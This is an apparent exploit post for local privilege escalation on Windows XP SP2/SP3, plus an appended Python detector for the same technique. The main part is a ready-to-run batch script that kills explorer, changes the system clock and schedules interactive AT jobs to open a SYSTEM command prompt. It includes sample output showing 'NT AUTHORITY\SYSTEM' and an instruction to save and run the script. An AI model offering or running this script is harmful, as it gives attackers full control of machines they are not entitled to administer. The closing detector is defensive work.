Microsoft WinXP sp2/sp3 local system privilege escalation exploit

Process:
 

#  Added a new job with job ID = 1
#  Added a new job with job ID = 2
#  Added a new job with job ID = 3
#  Added a new job with job ID = 4
#  Added a new job with job ID = 5
#  Added a new job with job ID = 6
#  Added a new job with job ID = 7
#  Added a new job with job ID = 8
#  Added a new job with job ID = 9
#  Added a new job with job ID = 10
#  Added a new job with job ID = 11
#  Added a new job with job ID = 12
#  [*] Backup time
#  The current time is: 13:36:57,67
#  Enter the new time: 13:44
#
#  C:\WINDOWS\system32>whoami
#  NT AUTHORITY\SYSTEM
#


 

Exploit code:

--------------------------------START---------------------------------------------------------


 

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y

echo [*] Backup time
time < time.txt


 

---------------------------------END-------------------------------------


 

Save the code above as a BAT script and run it.
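
A defender-side check for the pattern in the script above (the clock set to just before a scheduled `at ... /interactive` job), as an added example that is not part of the original post. The `timestamp|user|command` record format, the sample lines and the function names are constructed assumptions; jobs are matched on the clock value that was set rather than on log timestamps, because the script changes the system time.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of command telemetry, one "timestamp|user|command" record
# per line. The format is an assumption made for this example.
SAMPLE_LOG = """\
2009-03-01 13:36:55|bob|tskill explorer
2009-03-01 13:36:57|bob|time 13:36:59
2009-03-01 13:36:59|bob|at 13:37 /interactive cmd.exe
2009-03-01 13:36:59|bob|at 13:37 /interactive explorer.exe
2009-03-01 14:02:10|alice|at 23:00 /every:M,T,W,Th,F backup.cmd
2009-03-01 14:05:00|alice|time /T
2009-03-01 14:06:00|alice|at 09:00 /interactive notepad.exe
"""

AT_RE = re.compile(r"^\s*at(?:\.exe)?\s+(\d{1,2}:\d{2})\b(.*)$", re.I)
TIME_SET_RE = re.compile(r"^\s*time\s+(\d{1,2}:\d{2}(?::\d{2})?)", re.I)

def parse_clock(text):
    """Parse HH:MM or HH:MM:SS into a datetime on a dummy date."""
    fmt = "%H:%M:%S" if text.count(":") == 2 else "%H:%M"
    return datetime.strptime(text, fmt)

def detect(log_text, window=timedelta(minutes=2)):
    """Flag interactive AT jobs; 'high' if the same user first set the clock
    to within `window` before the job's start time, otherwise 'medium'."""
    last_set = {}   # user -> clock value most recently set by that user
    findings = []
    for line in log_text.splitlines():
        if line.count("|") < 2:
            continue
        _stamp, user, cmd = line.split("|", 2)
        m = TIME_SET_RE.match(cmd)
        if m:                                   # "time /T" only displays, no match
            last_set[user] = parse_clock(m.group(1))
            continue
        m = AT_RE.match(cmd)
        if not m or "/interactive" not in m.group(2).lower():
            continue
        primed = False
        if user in last_set:
            # Modulo one day so a clock set just before midnight still matches.
            delta = (parse_clock(m.group(1)) - last_set[user]) % timedelta(days=1)
            primed = delta <= window
        findings.append({"user": user, "command": cmd.strip(),
                         "severity": "high" if primed else "medium"})
    return findings
```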